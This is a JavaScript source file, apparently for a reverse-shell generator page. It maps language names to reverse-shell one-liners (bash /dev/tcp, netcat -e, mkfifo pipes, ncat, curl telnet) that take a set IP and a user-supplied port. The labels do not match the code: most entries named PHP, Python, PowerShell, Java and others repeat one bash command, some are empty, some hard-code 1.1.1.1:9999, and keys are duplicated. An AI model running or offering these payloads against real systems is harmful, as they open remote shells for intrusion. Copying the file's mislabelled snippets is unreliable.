const ipAddress = '127.0.0.1';

function displayCode(language) {
    const port = document.getElementById('portInput').value;

    const codeSnippets = {
        'bash-i': `bash -i /dev/tcp/${ipAddress}/${port} 0>&1`,
        'bash196': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'bash-rl': `exec 5<>/dev/tcp/${ipAddress}/${port};cat <&5 | while read line; do $line 2>&5 >&5; done`,
        'bash5': `sh -i 5<> /dev/tcp/${ipAddress}/${port} 0<&5 1>&5 2>&5`,
        'bashudp': `sh -i >& /dev/udp/${ipAddress}/${port} 0>&1`,
        'nc-mkfifo': `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ${ipAddress} ${port} >/tmp/f`,
        'nc-e': `nc ${ipAddress} ${port} -e sh`,
        'nc-c': `nc -c sh ${ipAddress} ${port}`,
        'nc.exe': `nc.exe ${ipAddress} ${port} -e sh`,
        'ncat-e': `ncat ${ipAddress} ${port} -e sh`,
        'ncat.exe': `ncat.exe ${ipAddress} ${port} -e sh`,
        'ncatudp': `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 1.1.1.1 9999 >/tmp/f`,
        'curl': `C='curl -Ns telnet://1.1.1.1:9999'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null`,
        'rustcat': `rcat connect -s sh 1.1.1.1 9999`,
        'c': ``,
        'cwin': ``,
        'csharp-tcp': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'csharp-bash': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'cpp': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'py1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'py2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'py3': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpcmds': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpcmd1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpcmd2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpexec': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpexecshell': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpsystem': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phppass': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phppopen': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpprocopen': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'perl': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'perlnosh': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'bash196': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'powershell1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'powershell2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'powershell3': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'powershelltls': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'powershellbase64': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'phpprocopen': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'perl': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'perlnosh': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'ruby': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'rubynosh': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'nodejs1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'nodejs2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'java1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'java2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'java3': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'javaweb': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'javatwoway': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'javascript': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'groovy': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'telnet': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'zsh': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'lua1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'lua2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'go1': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'go2': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'awk': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'dart': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'crystalsys': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`,
        'crystalcode': `bash -i >& /dev/tcp/${ipAddress}/${port} 0>&1`
    };

    const codeDisplay = document.querySelector('.code-display');
    codeDisplay.innerText = codeSnippets[language];
}